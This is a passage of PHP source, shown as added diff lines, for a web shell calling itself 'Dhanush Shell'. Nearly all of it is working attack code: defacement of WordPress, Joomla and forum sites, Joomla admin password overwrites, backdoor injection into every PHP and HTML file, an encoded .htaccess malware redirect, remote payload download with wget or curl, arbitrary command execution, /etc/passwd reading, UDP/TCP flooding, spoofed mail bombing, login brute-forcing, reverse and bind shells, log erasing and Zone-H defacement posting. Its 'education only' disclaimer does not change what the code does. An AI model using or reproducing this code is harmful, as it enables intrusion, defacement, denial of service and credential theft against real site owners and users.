"; + } + else if($_POST['forumdeface'] == "ipb") + { + $head = $_POST['head']; + $catid = $_POST['f5']; + + $IPB = "forums"; + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'"); + else + $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'"); + if($result) + echo "
Forum Defaced Successfully
"; + else + echo "
Cannot Deface Forum
"; + } + else if($_POST['forumdeface'] == "wp") + { + $catid = $_POST['f5']; + $head = $_POST['head']; + + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + { + if(isset($_POST["alll"]) && $_POST["alll"] == "All") + $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'"; + else + $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; + } + else + { + if(isset($_POST["alll"]) && $_POST["alll"] == "All") + $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'"; + else + $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; + + } + $result =@mysql_query($query,$con) or mysql_error(); + if($result) + echo "
Wordpress Defaced Successfully
"; + else + echo "
Cannot Deface Wordpress
"; + } + else if($_POST['forumdeface'] == "joomla") + { + $site_url = $_POST['siteurl']; + $dbprefix = $_POST['tableprefix']; + $dbname = $_POST['f2']; + $h=""; + + function randomt() + { + $chars = "abcdefghijkmnopqrstuvwxyz023456789"; + srand((double)microtime()*1000000); + $i = 0; + $pass = '' ; + + while ($i <= 7) + { + $num = rand() % 33; + $tmp = substr($chars, $num, 1); + $pass = $pass . $tmp; + $i++; + } + + return $pass; + } + function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) + { + $ar0=explode($marqueurDebutLien, $text); + $ar1=explode($marqueurFinLien, $ar0[$i]); + $ar=trim($ar1[0]); + return $ar; + } + $co=randomt(); + + $link=mysql_connect($localhost,$username,$password) ; + mysql_select_db($dbname,$link); + + $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); + + $req =mysql_query("SELECT * from `".$dbprefix."extensions` "); + + if ( $req ) + { + $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); + $data = mysql_fetch_array($req); + $template_name=$data["template"]; + + $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); + $data = mysql_fetch_array($req); + $template_id=$data["extension_id"]; + + $url2=$site_url."/index.php"; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + + + $buffer = curl_exec($ch); + + $return=entre2v2($buffer ,'[-] Login Error"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&layout=edit"; + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $pos = strpos($buffer,'
'); + if($pos === false) + { + echo("
Cannot Deface Joomla
"); + } + else + { + echo("
Joomla Defaced Successfully
"); + } + } + else + { + $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); + $data = mysql_fetch_array($req); + $template_name=$data["template"]; + + $url2=$site_url."/index.php"; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 1); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden=entre2v2($buffer ,'[-] Login Error"); + exit; + } + + $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); + } + + $url2=$site_url."/index.php?option=com_templates&layout=edit"; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url2); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_USERAGENT, $useragent); + curl_setopt($ch, CURLOPT_COOKIEJAR, $co); + curl_setopt($ch, CURLOPT_COOKIEFILE, $co); + $buffer = curl_exec($ch); + + $pos = strpos($buffer,'
'); + if($pos === false) + { + echo("
Cannot Deface Joomla
"); + exit; + } + else + { + echo("
Joomla Defaced Successfully
"); + } + } + } +} +else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '') +{ + $filetype = $_POST['filetype']; + + $mode = "a"; + + if($_POST['mode'] == 'Apender') + $mode = "a"; + + if($_POST['mode'] == 'Overwriter') + $mode = "w"; + + if (is_dir($_POST['pathtomass'])) + { + $lolinject = $_POST['injectthis']; + $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype; + if(substr($_POST['pathtomass'], -1) == "\\") + $mypath = $_POST['pathtomass'] . "*.".$filetype; + foreach (glob($mypath) as $injectj00) + { + if($injectj00 == __FILE__) + continue; + $fp=fopen($injectj00,$mode); + if (fputs($fp,$lolinject)) + echo '
'.$injectj00.' was injected
'; + else + echo 'failed to inject '.$injectj00.'
'; + } + } + else + echo ''.$_POST['pathtomass'].' is not available!'; +} +else if(isset($_POST['mailfunction'])) +{ + if($_POST['mailfunction'] == "dobombing") + { + if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '') + { + $times = $_POST['times']; + while($times--) + { + if(isset($_POST['padding'])) + { + $fromPadd = rand(0,9999); + $subjectPadd = " -- ID : ".rand(0,9999999); + $messagePadd = "\n\n------------------------------\n".rand(0,99999999); + + } + $from = "president$fromPadd@whitehouse.gov"; + if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from)) + { + $error = 1; + echo "
Some Error Occured!
"; + break; + } + } + if($error != 1) + echo "
Mail(s) Sent!
"; + } + } + else if($_POST['mailfunction'] == "massmailing") + { + if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message'])) + { + if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from'])) + echo "
Mail Sent!
"; + else + echo "
Some Error Occured!
"; + } + } +} +else if(isset($_POST['code'])) +{ + if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true") + { + // FIlter Some Chars we dont need + ?>
+ ","",$code); + + // Evaluate PHP CoDE! + ?>
Result of execution this PHP-code :
"; + foreach (glob($_GET['path'] . "*.php") as $injectj00) + { + if($injectj00 == __FILE__) + continue; + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00) + { + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00) + { + if($myfile=fopen($injectj00,'a')) + { + fputs($myfile, $str); + fclose($myfile); + $coun = 1; + } + } + + + if($coun == 1) + echo "
Done !!!!
"; + else + echo "
Cannot open files !!!!
"; +} +else if(isset($_GET['redirect'])) +{ + if($myfile = fopen(".htaccess",'a')) + { + $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw"; + fwrite($myfile, gzuncompress(base64_decode($mal))); + fwrite($myfile, "\n\r"); + fclose($myfile); + echo "
Done !!!!
"; + } + else + echo "
Cannot open file !!!!
"; +} +else if(isset($_GET['malware'])) +{ ?> + "> +
+
| Infect Users || Redirect Search Engine TO Malwared site |
+
+
+
+
+ +
+ Cannot Open File!!
"; +} +else if(isset($_POST['getcode'])) +{ + if($myfile = fopen(".htaccess",'a')) + { + fwrite($myfile, $_POST['getcode']); + fwrite($myfile, "\n\r"); + fclose($myfile); + echo "Code Inserted Successfully!!!!"; + } + else + echo "Permission Denied"; +} +else if(isset($_GET['uploadurl'])) +{ + $functiontype = trim($_GET['functiontype']); + $wurl = trim($_GET['wurl']); + $path = magicboom($_GET['path']); + + function remotedownload($cmd,$url) + { + $namafile = basename($url); + switch($cmd) + { + case 'wwget': + execmd(which('wget')." ".$url." -O ".$namafile); + break; + case 'wlynx': + execmd(which('lynx')." -source ".$url." > ".$namafile); + break; + case 'wfread' : + execmd($wurl,$namafile); + break; + case 'wfetch' : + execmd(which('fetch')." -o ".$namafile." -p ".$url); + break; + case 'wlinks' : + execmd(which('links')." -source ".$url." > ".$namafile); + break; + case 'wget' : + execmd(which('GET')." ".$url." > ".$namafile); + break; + case 'wcurl' : + execmd(which('curl')." ".$url." -o ".$namafile); + break; + default: + break; + } + return $namafile; + } + $namafile = remotedownload($functiontype,$wurl); + $fullpath = $path . $directorysperator . $namafile; + if(is_file($fullpath)) + { + echo "
File uploaded to $fullpath
"; + } + else + echo "
Failed to upload $namafile
"; +} +else if(isset($_GET['createfolder'])) +{ + if(!mkdir($_GET['createfolder'])) + echo "Failed To create"; + else + echo "Folder Created Successfully"; +} +else if(isset($_GET['selfkill'])) +{ + if(unlink(__FILE__)) + echo "
Good Bye......
"; + else + echo "
Shell cannot be removed......
"; +} +else if(isset($_GET['Create'])) +{ + ?> +
+ +
+ +
+ +File Created Successfully"; + } + else + echo "Cannot Create File"; +} +else if(isset($_REQUEST["defaceforum"])) +{ + ?> +
+ Forum Index Changer +
+ + + + + + + + + + + + + + + + + +
Host : Database :
User : Password : 
Type : + Prefix :
+ + + + +

 

+ +

+
+
+ "; + ?> +
+ Forum Password Changer +
+ + + + + + + + + + +
Host :   DataBase :
 User : Password : 
Type : + Prefix :
+ +

User ID :  New Password :
+ + + + + +

+
+
+ = $maxTime) + { + break; + } + } + echo "Dos Completed!
"; + echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."
"; + echo "Total Number of Packets Sent : " . $packets . "
"; + echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "
"; + echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "
"; + } +} +else if(isset($_GET['fuzzer'])) +{ + if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "") + { + $IP=$_GET['ip']; + $port=$_GET['port']; + $times = $_GET['exTime']; + $timeout = $_GET['timeout']; + $send = 0; + $ending = ""; + $multiplier = $_GET['multiplier']; + $data = ""; + $mode="tcp"; + $data .= "GET /"; + $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r"; + if($_GET['type'] == "tcp") + { + $mode = "tcp"; + } + + while($multiplier--) + { + $data .= urlencode($_GET['no0fBytes']); + } + $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers + $data .= "by-Dhanush".$ending; + $length = strlen($data); + + + echo "Sending Data :-

$data

"; + + for($i=0;$i<$times;$i++) + { + $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); + if($socket) + { + fwrite($socket , $data , $length ); + fclose($socket); + } + } + echo "Fuzzing Completed!
"; + echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
"; + echo "Total Number of Packets Sent : " . $times . "
"; + echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "
"; + echo "Data per packet = " . HumanReadableFilesize($length) . "
"; + } +} +else if(isset($_GET['bypassit'])) +{ + if(isset($_GET['copy'])) + { + if(@copy($_GET['copy'],"test1.php")) + { + $fh=fopen("test1.php",'r'); + echo "

"; + @fclose($fh); + unlink("test1.php"); + } + } + else if(isset($_GET['imap'])) + { + $string = $_GET['imap']; + echo ""; + } + else if(isset($_GET['sql'])) + { + echo ""; + } + else if(isset($_GET['curl'])) + { + $ch=curl_init("file://" . $_GET[curl]); + curl_setopt($ch,CURLOPT_HEADERS,0); + curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); + $file_out=curl_exec($ch); + curl_close($ch); + echo "

"; + } + else if(isset($_GET['include'])) + { + if(file_exists($_GET['include'])) + { + echo ""; + } + else + echo "
Can't Read" . $_GET['include'] . "
"; + } + else if(isset($_GET['id'])) + { + echo ""; + break; + } + else if(isset($_GET['tempnam'])) + { + $mytmp = tempnam ( 'tmp', $_GET['tempnam'] ); + $fp = fopen ( $mytmp, 'r' ); + while(!feof($fp)) + echo fgets($fp); + fclose ( $fp ); + } + else if(isset($_GET['symlnk'])) + { + echo ""; + } + if(isset($_GET['newtype'])) + { + $filename = $_GET['newtype']; + echo ""; + } +} +// Deface Website +else if(isset($_GET['deface'])) +{ + $myfile = fopen($_GET['deface'],'w'); + if(fwrite($myfile, base64_decode($ind))) + {fclose($myfile); + echo "Index Defaced Successfully";} + else + echo "Donot have write permission"; +} +else if(isset($_GET['perms'])) +{ +?> +
+ + + + + + + + +
Change Permissions
+
+ +
+ =0;--$i) + $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1)); + if(@chmod($_GET['myfilename'],$perms)) + echo "
File Permissions Changed Successfully
"; + else + echo "
Cannot Change File Permissions
"; + } +} +else if(isset($_GET['rename'])) +{ +?> +
+ + + + + + + + + + +
File
To
+
+ File Renamed Successfully
"; + + } +} +else if(isset($_GET['open'])) +{ + if(is_file($_GET['myfilepath'])) + { + $owner = "0/0"; + if($os == "Linux") + $owner = getOGid($_GET['myfilepath']); + ?> +
+ + + + + + + +
File : Permissions :
Size : Owner/Group :
+
+ +
+ File Saved Successfully!
"; + else + echo "Cannot Write into File"; + } + else + { + echo "File Name Specified does not exists!"; + } +} +else if(isset($_POST["SendNowToZoneH"])) +{ + $hacker = $_POST['defacer']; + $method = $_POST['hackmode']; + $neden = $_POST['reason']; + $site = $_POST['domain']; + + if (empty($hacker)) + { + die("
[-] You Must Fill the Attacker name !
"); + } + elseif($method == "--------SELECT--------") + { + die("
[-] You Must Select The Method !
"); + } + elseif($neden == "--------SELECT--------") + { + die("
[-] You Must Select The Reason
"); + } + elseif(empty($site)) + { + die("
[-] You Must Inter the Sites List !
"); + } + // Zone-h Poster + function ZoneH($url, $hacker, $hackmode,$reson, $site ) + { + $k = curl_init(); + curl_setopt($k, CURLOPT_URL, $url); + curl_setopt($k,CURLOPT_POST,true); + curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); + curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); + curl_setopt($k, CURLOPT_RETURNTRANSFER, true); + $kubra = curl_exec($k); + curl_close($k); + return $kubra; + } + + $i = 0; + $sites = explode("\n", $site); + echo "
";
+	while($i < count($sites)) 
+	{
+		if(substr($sites[$i], 0, 4) != "http") 
+		{
+				$sites[$i] = "http://".$sites[$i];
+		}
+		ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
+		echo "Site : ".$sites[$i]." Posted !
"; + ++$i; + } + + echo "Sending Sites To Zone-H Has Been Completed Successfully !!
"; +} +else if(isset($_GET['executemycmd'])) +{ + $comm = $_GET['executemycmd']; + chdir($_GET['executepath']); + echo shell_exec($comm); +} +// View Passwd file +else if(isset($_GET['passwd'])) +{ + $test=''; + $tempp= tempnam($test, "cx"); + $get = "/etc/passwd"; + $name=@posix_getpwuid(@fileowner($get)); + $group=@posix_getgrgid(@filegroup($get)); + $owner = $name['name']. " / ". $group['name']; + ?> + + + + + + + +
File : Permissions :
Size : Owner/Group :
+

"; + unlink($tempp); + } + else + { + ?> +
+ + + + + + + + + + + +
From :
To :

+
+
$get
"; + unlink($tempp); + } +} +else if(isset($_GET['bomb'])) +{ + ?>
+
+ + + + + + + + + + + + + + + + + + + + + + + +
To + +
Subject + +
No. of Times + +
Pad your message (Less spam detection)
+ +
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
From
To
Subject
+ +
+ +
+
+ +
+ + + + +
| Get Domains || Symlink Server || Symlink File || Script Locator |

+
+
+ +
| Forum Defacer || Forum Password Changer |

+
+
+
+
Server security information

+ + + + + + + + + + + + + + + + + + + + + + + + + +
CurlOracleMySQLMSSQLPostgreSQLOpen Base DirectorySafe_Exec_DirPHP VersionMagic QuotesServer Admin
NONE";}else {echo "$df";};} ?>

+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ Directory + + +
+ Mode + + +
+ File Type + + +
Create A backdoor by injecting this code in every php file of current directory
+ +
+ +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Safe mode bypass
+

Using copy() function

+
+ +
+
+

Using imap() function

+
+ +
+
+

Using sql() function

+
+ +
+
+

Using Curl() function

+
+ +
+
+

Bypass using include()

+
+ +
+
+

Using id() function

+
+ +
+
+

Using tempnam() function

+
+ +
+
+

Using symlink() function

+
+ +
+
+

Using Bypass function

+
+ + + +
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ IP + + +
+ Port + + +
+ Timeout + + +
+ No of times + + +
+ Message (The message Should be long and it will be multiplied with the value after it) + + + + x + + +
+ +
+
+
PHP CURL NOT EXIST
"; + } + ?> +
Zone-h Poster
+
+ + + + + + +
+
+ +
+
+
+
+
+ +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ IP + + +
+ Port + + +
+ Timeout (Time in seconds) + + +
+ Execution Time (Time in seconds) + + +
+ No of Bytes per/packet + + +
+ +
+
+ +
+
| Mail Bomber || Mass Mailer |

+ +

+ + + + + + + + + + + +
Port Scanner
+ + + +
+
+ +
+
+ + + + + + + + + + + + + + + + + + + + +
BruteForce
Type : + +
Server : Port : " class="sbox">
Brute type :
+
+ Login :        
+ Dictionary : +
+

+ +
+
+ +

+ + +
+ +
+
+ + + +
+ Select Website +

+
+

+ + +
+ + + + + + + + + + + + +
Reverse ShellBind Shell
+ + + + + + + + + + + + + +
IP + +
Port
Use:   +
+
+
+ + + + + + + + + + + + +
Port + +
Password + +
Using +    +
+
Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!
Click "Bind", use netcat and give it the command 'nc 9891"!
+ + +
+ +
| Set Your 404 Page || Set Specified 404 Page |

+
+ +
+

D h a n u s h
+ [--==Coded By Arjun==--] +

+
+       -  --  -
+       -- -- --
+       --    --
+       ---  ---
+       ------
+       ----
+   ----             
+ ------           
+-------          
+---   --          
+      --      --- 
+      --      ----- 
+     ---      --- --- 
+     ---    ---   ---
+--   ---------     --
+--    -------      --
+ --     ----       --
+  --     ---       --
+  --     --        --
+   ---  ---   --  ---
+    ------    ------
+     ----      ----
+      
+
+		
+ Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it


GREETZ To All Indian Hackers
| जय महाकाल | | जय हिन्द |

+ +
+ + + + + + + + + + + + + + + + + + + + + +
Connect To Database
Server Address :
Username :
Password:
+
+
+ +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ "> +
+
| Malware Attack || Insert Own Code |

+
+ "; + ob_start(); + eval("phpinfo();"); + $b = ob_get_contents(); + ob_end_clean(); + $a = strpos($b,"")+6; // yeah baby,, your body is wonderland ;-) + $z = strpos($b,""); + $s_result = "
".substr($b,$a,$z-$a)."
"; + echo $s_result; +} +else if(isset($_GET['execute'])) +{ + $comm = $_GET['execute']; + chdir($_GET['executepath']); + $check = shell_exec($comm); + + echo "
"; + + ?> +

+ +
+ Logs Cleared
"; + } + } else + { + if($openp = fopen("/tmp/logseraser.pl", 'w')) + { + fwrite($openp, $erase)or die("Error"); + fclose($openp); + $aidx = passthru("perl logseraser.pl linux"); + unlink("logseraser.pl"); + echo "
Logs Cleared
"; + } + } + } + else + { + $check = shell_exec($_GET['mycmd']); + echo "
"; + } +} +else if(isset($_GET['prototype'])) +{ + echo '

Results

Type: '.htmlspecialchars($_GET['prototype']).'
Server:
'.htmlspecialchars($_GET['serverport']).'
'; + if( $_GET['prototype'] == 'ftp' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $fp = @ftp_connect($ip, $port?$port:21); + if(!$fp) return false; + $res = @ftp_login($fp, $login, $pass); + @ftp_close($fp); + return $res; + } + } + elseif( $_GET['prototype'] == 'mysql' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); + @mysql_close($res); + return $res; + } + } + elseif( $_GET['prototype'] == 'pgsql' ) + { + function BruteFun($ip,$port,$login,$pass) + { + $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; + $res = @pg_connect($str); + @pg_close($res); + return $res; + } + } + + $success = 0; + $attempts = 0; + $server = explode(":", $_GET['server']); + if($_GET['type'] == 1) + { + $temp = @file('/etc/passwd'); + if( is_array($temp)) + foreach($temp as $line) + { + $line = explode(":", $line); + ++$attempts; + if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) ) + { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; + } + if(@$_GET['reverse']) + { + $tmp = ""; + for($i=strlen($line[0])-1; $i>=0; --$i) + $tmp .= $line[0][$i]; + ++$attempts; + if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) ) + { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); + } + } + } + } + elseif($_GET['type'] == 2) + { + $temp = @file($_GET['dict']); + if( is_array($temp) ) + foreach($temp as $line) + { + $line = trim($line); + ++$attempts; + if(BruteFun($server[0],@$server[1], $_GET['login'], $line) ) + { + $success++; + echo ''.htmlspecialchars($_GET['login']).':'.htmlspecialchars($line).'
'; + } + } + } + echo "Attempts: $attempts Success: $success
"; +} +// Execute Query +else if(isset($_GET["executeit"])) +{ + if(isset($_GET['username']) && isset($_GET['server'])) + { + $dbserver = $_GET['server']; + $dbuser = $_GET['username']; + $dbpass = $_GET['password']; + if(mysql_connect($dbserver,$dbuser,$dbpass)) + { + setcookie("dbserver", $dbserver); + setcookie("dbuser", $dbuser); + setcookie("dbpass", $dbpass); + + listdatabase(); + } + else + echo "cannotconnect"; + } +} +else if(isset($_GET['action']) && isset($_GET['dbname'])) + + + { + if($_GET['action'] == "createDB") + { + $dbname = $_GET['dbname']; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); + mysql_query("create database $dbname",$mysqlHandle); + listdatabase(); + } + if($_GET['action'] == 'dropDB') + { + $dbname = $_GET['dbname']; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass); + mysql_query("drop database $dbname",$mysqlHandle); + mysql_close($mysqlHandle); + listdatabase(); + } + + if($_GET['action'] == 'listTables') + { + listtable(); + } + + // Create Tables + if($_GET['action'] == "createtable") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("CREATE TABLE $tablename ( no INT )"); + listtable(); + } + + // Drop Tables + if($_GET['action'] == "dropTable") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("drop table $tablename"); + listtable(); + } + + // Empty Tables + 
if($_GET['action'] == "empty") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + mysql_query("delete from $tablename"); + listtable(); + } + + // Empty Tables + if($_GET['action'] == "dropField") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $fieldname = $_GET['fieldname']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr , $mysqlHandle ); + listtable(); + } + + if($_GET['action'] == 'viewdb') + { + listdatabase(); + } + + // View Table Schema + if($_GET['action'] == "viewSchema") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + echo "
"; + $pResult = mysql_query( "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + echo "

"; + echo ""; + for( $i = 0; $i < $num; $i++ ) + { + $field = mysql_fetch_array( $pResult ); + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + $fieldname = $field["Field"]; + echo "\n"; + echo "\n"; + } + echo "
FieldTypeNullKey
".$field["Field"]."".$field["Type"]."".$field["Null"]."".$field["Key"]."".$field["Default"]."".$field["Extra"]."Drop
"; + echo ""; + } + + // Execute Query + if($_GET['action'] == "executequery") + { + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + $tablename = $_GET['tablename']; + $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); + mysql_select_db($dbname); + $result = mysql_query($_GET['executemyquery']); + + // results + echo "\r\n". strtoupper($_GET['executemyquery']) . "
